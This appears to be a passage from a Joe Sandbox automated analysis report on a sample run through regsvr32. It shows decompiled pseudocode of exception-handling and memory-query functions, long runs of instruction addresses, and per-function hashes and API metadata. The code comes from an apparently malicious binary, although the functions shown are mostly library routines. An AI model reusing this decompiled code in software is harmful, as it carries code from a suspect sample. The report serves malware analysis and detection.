										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x67cd4240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x67cd41f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x67cd4200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x67cd41fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x67cd4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x67cd4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x67cd4240 = 1;
							__eflags =  *0x67cd4240;
							if( *0x67cd4240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x67cd4200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x67cd4200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x67cd4240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x67cd4200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x67cd41f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x67cd4200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x67cd4200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}




































                                                                                                                                                                  0x67cd248f
                                                                                                                                                                  0x67cd2492
                                                                                                                                                                  0x67cd2498
                                                                                                                                                                  0x67cd24b6
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd24b6
                                                                                                                                                                  0x67cd24a0
                                                                                                                                                                  0x67cd24a9
                                                                                                                                                                  0x67cd24af
                                                                                                                                                                  0x67cd24be
                                                                                                                                                                  0x67cd24c1
                                                                                                                                                                  0x67cd24c4
                                                                                                                                                                  0x67cd24ce
                                                                                                                                                                  0x67cd24ce
                                                                                                                                                                  0x67cd24d0
                                                                                                                                                                  0x67cd24d3
                                                                                                                                                                  0x67cd24d5
                                                                                                                                                                  0x67cd24d5
                                                                                                                                                                  0x67cd24d7
                                                                                                                                                                  0x67cd24da
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd24dc
                                                                                                                                                                  0x67cd24de
                                                                                                                                                                  0x67cd2544
                                                                                                                                                                  0x67cd2544
                                                                                                                                                                  0x67cd26a2
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd26a2
                                                                                                                                                                  0x67cd24e0
                                                                                                                                                                  0x67cd24e0
                                                                                                                                                                  0x67cd24e4
                                                                                                                                                                  0x67cd24e6
                                                                                                                                                                  0x67cd24e6
                                                                                                                                                                  0x67cd24e6
                                                                                                                                                                  0x67cd24e6
                                                                                                                                                                  0x67cd24e9
                                                                                                                                                                  0x67cd24ea
                                                                                                                                                                  0x67cd24ed
                                                                                                                                                                  0x67cd24ed
                                                                                                                                                                  0x67cd24f1
                                                                                                                                                                  0x67cd24f5
                                                                                                                                                                  0x67cd2503
                                                                                                                                                                  0x67cd2503
                                                                                                                                                                  0x67cd250b
                                                                                                                                                                  0x67cd2511
                                                                                                                                                                  0x67cd2513
                                                                                                                                                                  0x67cd2515
                                                                                                                                                                  0x67cd2525
                                                                                                                                                                  0x67cd2532
                                                                                                                                                                  0x67cd2536
                                                                                                                                                                  0x67cd253b
                                                                                                                                                                  0x67cd253d
                                                                                                                                                                  0x67cd25bb
                                                                                                                                                                  0x67cd25bb
                                                                                                                                                                  0x67cd253f
                                                                                                                                                                  0x67cd253f
                                                                                                                                                                  0x67cd253f
                                                                                                                                                                  0x67cd25bd
                                                                                                                                                                  0x67cd25bf
                                                                                                                                                                  0x67cd26a0
                                                                                                                                                                  0x67cd26a0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25c5
                                                                                                                                                                  0x67cd25c5
                                                                                                                                                                  0x67cd25cc
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25d2
                                                                                                                                                                  0x67cd25d6
                                                                                                                                                                  0x67cd2632
                                                                                                                                                                  0x67cd2634
                                                                                                                                                                  0x67cd263c
                                                                                                                                                                  0x67cd263e
                                                                                                                                                                  0x67cd2640
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2642
                                                                                                                                                                  0x67cd2648
                                                                                                                                                                  0x67cd264a
                                                                                                                                                                  0x67cd264c
                                                                                                                                                                  0x67cd2661
                                                                                                                                                                  0x67cd2661
                                                                                                                                                                  0x67cd2663
                                                                                                                                                                  0x67cd2692
                                                                                                                                                                  0x67cd2699
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2699
                                                                                                                                                                  0x67cd2667
                                                                                                                                                                  0x67cd2668
                                                                                                                                                                  0x67cd266a
                                                                                                                                                                  0x67cd266c
                                                                                                                                                                  0x67cd266c
                                                                                                                                                                  0x67cd266e
                                                                                                                                                                  0x67cd2670
                                                                                                                                                                  0x67cd2672
                                                                                                                                                                  0x67cd2686
                                                                                                                                                                  0x67cd2686
                                                                                                                                                                  0x67cd2689
                                                                                                                                                                  0x67cd268b
                                                                                                                                                                  0x67cd268b
                                                                                                                                                                  0x67cd268c
                                                                                                                                                                  0x67cd268c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2674
                                                                                                                                                                  0x67cd2674
                                                                                                                                                                  0x67cd2674
                                                                                                                                                                  0x67cd267d
                                                                                                                                                                  0x67cd267e
                                                                                                                                                                  0x67cd2680
                                                                                                                                                                  0x67cd2682
                                                                                                                                                                  0x67cd2682
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2674
                                                                                                                                                                  0x67cd2672
                                                                                                                                                                  0x67cd264e
                                                                                                                                                                  0x67cd2655
                                                                                                                                                                  0x67cd2655
                                                                                                                                                                  0x67cd2657
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2659
                                                                                                                                                                  0x67cd265a
                                                                                                                                                                  0x67cd265d
                                                                                                                                                                  0x67cd265f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd265f
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2655
                                                                                                                                                                  0x67cd25d8
                                                                                                                                                                  0x67cd25db
                                                                                                                                                                  0x67cd25e0
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25e9
                                                                                                                                                                  0x67cd25eb
                                                                                                                                                                  0x67cd25f1
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25f7
                                                                                                                                                                  0x67cd25fd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2603
                                                                                                                                                                  0x67cd2605
                                                                                                                                                                  0x67cd260e
                                                                                                                                                                  0x67cd2612
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2618
                                                                                                                                                                  0x67cd261b
                                                                                                                                                                  0x67cd261d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2624
                                                                                                                                                                  0x67cd2626
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2628
                                                                                                                                                                  0x67cd262c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd262c
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2517
                                                                                                                                                                  0x67cd2517
                                                                                                                                                                  0x67cd2517
                                                                                                                                                                  0x67cd251e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2520
                                                                                                                                                                  0x67cd2521
                                                                                                                                                                  0x67cd2523
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2523
                                                                                                                                                                  0x67cd254b
                                                                                                                                                                  0x67cd254d
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd255d
                                                                                                                                                                  0x67cd255f
                                                                                                                                                                  0x67cd2561
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2567
                                                                                                                                                                  0x67cd256e
                                                                                                                                                                  0x67cd259a
                                                                                                                                                                  0x67cd259a
                                                                                                                                                                  0x67cd259c
                                                                                                                                                                  0x67cd259e
                                                                                                                                                                  0x67cd25b2
                                                                                                                                                                  0x67cd25b4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25a0
                                                                                                                                                                  0x67cd25a0
                                                                                                                                                                  0x67cd25a0
                                                                                                                                                                  0x67cd25a9
                                                                                                                                                                  0x67cd25aa
                                                                                                                                                                  0x67cd25ac
                                                                                                                                                                  0x67cd25ae
                                                                                                                                                                  0x67cd25ae
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd25a0
                                                                                                                                                                  0x67cd2570
                                                                                                                                                                  0x67cd2573
                                                                                                                                                                  0x67cd2575
                                                                                                                                                                  0x67cd2587
                                                                                                                                                                  0x67cd2587
                                                                                                                                                                  0x67cd258a
                                                                                                                                                                  0x67cd258c
                                                                                                                                                                  0x67cd258c
                                                                                                                                                                  0x67cd258d
                                                                                                                                                                  0x67cd258d
                                                                                                                                                                  0x67cd2593
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2577
                                                                                                                                                                  0x67cd2577
                                                                                                                                                                  0x67cd2577
                                                                                                                                                                  0x67cd257e
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2580
                                                                                                                                                                  0x67cd2580
                                                                                                                                                                  0x67cd2581
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2581
                                                                                                                                                                  0x67cd2583
                                                                                                                                                                  0x67cd2585
                                                                                                                                                                  0x67cd2598
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2598
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2585
                                                                                                                                                                  0x67cd24f7
                                                                                                                                                                  0x67cd24fa
                                                                                                                                                                  0x67cd24fd
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd24ff
                                                                                                                                                                  0x67cd2501
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2501
                                                                                                                                                                  0x67cd24c6
                                                                                                                                                                  0x67cd24c8
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x00000000

                                                                                                                                                                  APIs
                                                                                                                                                                  • NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 67CD2536
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: MemoryQueryVirtual
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2850889275-0
                                                                                                                                                                  • Opcode ID: 7f5f6b0ed3133dd10b6f9346fc91efe52e8fe3acbce19963c450383c614cdd65
                                                                                                                                                                  • Instruction ID: 5c5d0a0829ccef5d51a5a9a0f2cda676981e68c8eb79685ebd190d80f18e558b
                                                                                                                                                                  • Opcode Fuzzy Hash: 7f5f6b0ed3133dd10b6f9346fc91efe52e8fe3acbce19963c450383c614cdd65
                                                                                                                                                                  • Instruction Fuzzy Hash: D561C031684A029FEB19CF69D8F0B6973B5EB9E314F248069DB65C7290F731D983CA50
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D3ED13, Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • EnumSystemLocalesW.KERNEL32(67D3ECFF,00000001,?,67D3DC71,67D3DD0F,00000003,00000000,?,?,00000000,00000000,00000000,00000000,00000000), ref: 67D3ED41
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: EnumLocalesSystem
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2099609381-0
                                                                                                                                                                  • Opcode ID: 5815c728e1ad7cff02ced7a92dd8d18d30f6f268cd27a2ceced4c876ad6da38c
                                                                                                                                                                  • Instruction ID: 1d2f81366ea0b471ce98950a6823121e5e85f2f254804e137c0fcaef64510bc4
                                                                                                                                                                  • Opcode Fuzzy Hash: 5815c728e1ad7cff02ced7a92dd8d18d30f6f268cd27a2ceced4c876ad6da38c
                                                                                                                                                                  • Instruction Fuzzy Hash: 6FE04672040218EBEF00CFA4D846B9D3BB5FB4A730F048801F61C6A090C2B9A9A09F4C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D3ED99, Relevance: 1.5, APIs: 1, Instructions: 18COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(00000000,?,00000002,?,?,67D33D76,?,?,?,00000002,?,00000000,00000000), ref: 67D3EDC0
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: InfoLocale
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 2299586839-0
                                                                                                                                                                  • Opcode ID: 718f4d58fcb974bda93e95fcbbeeb326d306bad0e50160065a3e634ac76aebd5
                                                                                                                                                                  • Instruction ID: e5d55977afabbfda19944eff54ada47fd236e14b7fb1178e47ffd11d9e193ebd
                                                                                                                                                                  • Opcode Fuzzy Hash: 718f4d58fcb974bda93e95fcbbeeb326d306bad0e50160065a3e634ac76aebd5
                                                                                                                                                                  • Instruction Fuzzy Hash: 57D01776004119FFEF019FE0E8068AA3B69FB8A634B040C00F91C45550DA36A8609B65
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D35EA1, Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 67D35EA7
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ExceptionFilterUnhandled
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3192549508-0
                                                                                                                                                                  • Opcode ID: bb9a1b7cd1bcee8d1ce3067de9e7b3d41d45dced042025dd3fafb9567b853a09
                                                                                                                                                                  • Instruction ID: a7a4e9a123f2e0eb5f4f0669bcb54a7bf67c01314686a157877decc49840fdd7
                                                                                                                                                                  • Opcode Fuzzy Hash: bb9a1b7cd1bcee8d1ce3067de9e7b3d41d45dced042025dd3fafb9567b853a09
                                                                                                                                                                  • Instruction Fuzzy Hash: 1FA0123000010CE7CE001A45D8054487F1CEA429A07004010F40C00011873254104994
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D35139, Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  APIs
                                                                                                                                                                  • GetProcessHeap.KERNEL32(67D2C958,67DA3798,00000008,67DA4008,67DA354C,?,00000001), ref: 67D35139
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: HeapProcess
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 54951025-0
                                                                                                                                                                  • Opcode ID: 4098b80a7e351d0edfb9383180c8d85a7570595c08bdc88697b466ea481b020a
                                                                                                                                                                  • Instruction ID: f543eabd14578f204719f6a56f4dccdaf819e99adfb538f1b2f7ae61aa7bfe6e
                                                                                                                                                                  • Opcode Fuzzy Hash: 4098b80a7e351d0edfb9383180c8d85a7570595c08bdc88697b466ea481b020a
                                                                                                                                                                  • Instruction Fuzzy Hash: 5EB012F030710287BF080F38945A10D35D8774D221311053D7007C9140DF24C4909A0C
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67D4D7C5, Relevance: .2, Instructions: 197COMMONLIBRARYCODE
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586991103.0000000067CDE000.00000020.00020000.sdmp, Offset: 67CDE000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cde000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                                                                                                                                                                  • Instruction ID: b8d93a9013950c55917d18f98444529b66ace8fba6ffbcd75cd916dc7abda030
                                                                                                                                                                  • Opcode Fuzzy Hash: 13ae554fede668713c8418b731cea2a7546aabb52c717da24dcf4f4522932379
                                                                                                                                                                  • Instruction Fuzzy Hash: 05614FB1E00625CBDB18CF1DC890169FBF6BF99300729C5AAD959EB319E670D941CB90
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67CD2264, Relevance: .1, Instructions: 77COMMONCrypto
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 71%
                                                                                                                                                                  			E67CD2264(signed int* __eax, void* __ebx, signed int __edx, char _a4, long _a8, intOrPtr _a12) {
				intOrPtr _v8;
				char _v12;
				void* __ebp;
				signed int* _t43;
				char _t44;
				void* _t46;
				void* _t49;
				intOrPtr* _t53;
				void* _t54;
				void* _t65;
				long _t66;
				signed int* _t80;
				signed int* _t82;
				void* _t84;
				signed int _t86;
				void* _t89;
				void* _t95;
				void* _t96;
				void* _t99;
				void* _t106;

				_t43 = _t84;
				_t65 = __ebx + 2;
				 *_t43 =  *_t43 ^ __edx ^  *__eax;
				_t89 = _t95;
				_t96 = _t95 - 8;
				_push(_t65);
				_push(_t84);
				_push(_t89);
				asm("cld");
				_t66 = _a8;
				_t44 = _a4;
				if(( *(_t44 + 4) & 0x00000006) != 0) {
					_push(_t89);
					E67CD23CB(_t66 + 0x10, _t66, 0xffffffff);
					_t46 = 1;
				} else {
					_v12 = _t44;
					_v8 = _a12;
					 *((intOrPtr*)(_t66 - 4)) =  &_v12;
					_t86 =  *(_t66 + 0xc);
					_t80 =  *(_t66 + 8);
					_t49 = E67CD2485(_t66);
					_t99 = _t96 + 4;
					if(_t49 == 0) {
						 *(_a4 + 4) =  *(_a4 + 4) | 0x00000008;
						goto L11;
					} else {
						while(_t86 != 0xffffffff) {
							_t53 =  *((intOrPtr*)(_t80 + 4 + (_t86 + _t86 * 2) * 4));
							if(_t53 == 0) {
								L8:
								_t80 =  *(_t66 + 8);
								_t86 = _t80[_t86 + _t86 * 2];
								continue;
							} else {
								_t54 =  *_t53();
								_t89 = _t89;
								_t86 = _t86;
								_t66 = _a8;
								_t55 = _t54;
								_t106 = _t54;
								if(_t106 == 0) {
									goto L8;
								} else {
									if(_t106 < 0) {
										_t46 = 0;
									} else {
										_t82 =  *(_t66 + 8);
										E67CD2370(_t55, _t66);
										_t89 = _t66 + 0x10;
										E67CD23CB(_t89, _t66, 0);
										_t99 = _t99 + 0xc;
										E67CD2467(_t82[2]);
										 *(_t66 + 0xc) =  *_t82;
										_t66 = 0;
										_t86 = 0;
										 *(_t82[2])(1);
										goto L8;
									}
								}
							}
							goto L13;
						}
						L11:
						_t46 = 1;
					}
				}
				L13:
				return _t46;
			}























                                                                                                                                                                  0x67cd2268
                                                                                                                                                                  0x67cd2269
                                                                                                                                                                  0x67cd226a
                                                                                                                                                                  0x67cd226d
                                                                                                                                                                  0x67cd226f
                                                                                                                                                                  0x67cd2272
                                                                                                                                                                  0x67cd2273
                                                                                                                                                                  0x67cd2275
                                                                                                                                                                  0x67cd2276
                                                                                                                                                                  0x67cd2277
                                                                                                                                                                  0x67cd227a
                                                                                                                                                                  0x67cd2284
                                                                                                                                                                  0x67cd2335
                                                                                                                                                                  0x67cd233c
                                                                                                                                                                  0x67cd2345
                                                                                                                                                                  0x67cd228a
                                                                                                                                                                  0x67cd228a
                                                                                                                                                                  0x67cd2290
                                                                                                                                                                  0x67cd2296
                                                                                                                                                                  0x67cd2299
                                                                                                                                                                  0x67cd229c
                                                                                                                                                                  0x67cd22a0
                                                                                                                                                                  0x67cd22a5
                                                                                                                                                                  0x67cd22aa
                                                                                                                                                                  0x67cd232a
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd22ac
                                                                                                                                                                  0x67cd22ac
                                                                                                                                                                  0x67cd22b8
                                                                                                                                                                  0x67cd22ba
                                                                                                                                                                  0x67cd2315
                                                                                                                                                                  0x67cd2315
                                                                                                                                                                  0x67cd231b
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd22bc
                                                                                                                                                                  0x67cd22cb
                                                                                                                                                                  0x67cd22cd
                                                                                                                                                                  0x67cd22ce
                                                                                                                                                                  0x67cd22cf
                                                                                                                                                                  0x67cd22d2
                                                                                                                                                                  0x67cd22d2
                                                                                                                                                                  0x67cd22d4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd22d6
                                                                                                                                                                  0x67cd22d6
                                                                                                                                                                  0x67cd2320
                                                                                                                                                                  0x67cd22d8
                                                                                                                                                                  0x67cd22d8
                                                                                                                                                                  0x67cd22dc
                                                                                                                                                                  0x67cd22e4
                                                                                                                                                                  0x67cd22e9
                                                                                                                                                                  0x67cd22ee
                                                                                                                                                                  0x67cd22fa
                                                                                                                                                                  0x67cd2302
                                                                                                                                                                  0x67cd2309
                                                                                                                                                                  0x67cd230f
                                                                                                                                                                  0x67cd2313
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd2313
                                                                                                                                                                  0x67cd22d6
                                                                                                                                                                  0x67cd22d4
                                                                                                                                                                  0x00000000
                                                                                                                                                                  0x67cd22ba
                                                                                                                                                                  0x67cd232e
                                                                                                                                                                  0x67cd232e
                                                                                                                                                                  0x67cd232e
                                                                                                                                                                  0x67cd22aa
                                                                                                                                                                  0x67cd234a
                                                                                                                                                                  0x67cd2351

                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.586887246.0000000067CD1000.00000020.00020000.sdmp, Offset: 67CD0000, based on PE: true
                                                                                                                                                                  • Associated: 00000003.00000002.586875007.0000000067CD0000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586900121.0000000067CD3000.00000002.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586914004.0000000067CD5000.00000004.00020000.sdmp Download File
                                                                                                                                                                  • Associated: 00000003.00000002.586928100.0000000067CD6000.00000002.00020000.sdmp Download File
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_3_2_67cd0000_regsvr32.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                  • Instruction ID: 47f1ac006f41b4446628820c2526d164d1575431cc097f2e2ee87d8c4fd3b9bc
                                                                                                                                                                  • Opcode Fuzzy Hash: 12a7070065f657aa0aacf06b7ef6137888dfa06173cfdd6141a47a1bb7c7c469
                                                                                                                                                                  • Instruction Fuzzy Hash: 3421C8729002049FCB01DF68C8D09ABB7A9FF4D350B468169DE599B245F770F915C7E1
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 67DA6CC5, Relevance: .1, Instructions: 75COMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000003.00000002.587551185.0000000067DA6000.00000040.00020000.sdmp, Offset: 67DA6000, based on PE: false
